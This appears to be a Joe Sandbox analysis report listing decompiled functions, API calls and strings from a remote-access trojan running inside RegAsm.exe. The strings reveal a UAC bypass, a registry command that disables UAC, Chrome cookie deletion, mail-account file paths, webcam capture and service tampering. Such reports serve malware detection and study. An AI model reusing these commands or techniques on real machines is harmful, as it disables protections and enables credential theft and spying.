                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                • API String ID: 3851391207-1839356972
                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                Strings
                                                                • UserProfile, xrefs: 0040BAE8
                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                • API String ID: 2018770650-304995407
                                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prologSleep
                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                • API String ID: 3469354165-3054508432
                                                                • Opcode ID: 5b86701f5adbcf5e18b351e7d473d9c1822f7a9639d77f2baef9ce5fe532cdad
                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                • Opcode Fuzzy Hash: 5b86701f5adbcf5e18b351e7d473d9c1822f7a9639d77f2baef9ce5fe532cdad
                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                APIs
                                                                • _strlen.LIBCMT ref: 10001607
                                                                • _strcat.LIBCMT ref: 1000161D
                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                • String ID:
                                                                • API String ID: 1922816806-0
                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                APIs
                                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                • String ID:
                                                                • API String ID: 3594823470-0
                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                • String ID:
                                                                • API String ID: 493672254-0
                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                • _free.LIBCMT ref: 10005B2D
                                                                • _free.LIBCMT ref: 10005B55
                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                • _abort.LIBCMT ref: 10005B74
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                • _free.LIBCMT ref: 004482CC
                                                                • _free.LIBCMT ref: 004482F4
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                • _abort.LIBCMT ref: 00448313
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                APIs
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                • API String ID: 4036392271-1520055953
                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                • String ID: 0$MsgWindowClass
                                                                • API String ID: 2877667751-2410386613
                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                APIs
                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                Strings
                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateProcess
                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                • API String ID: 2922976086-4183131282
                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                Strings
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                • Rmc-O0U3JA, xrefs: 00407715
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-O0U3JA
                                                                • API String ID: 0-3910307753
                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
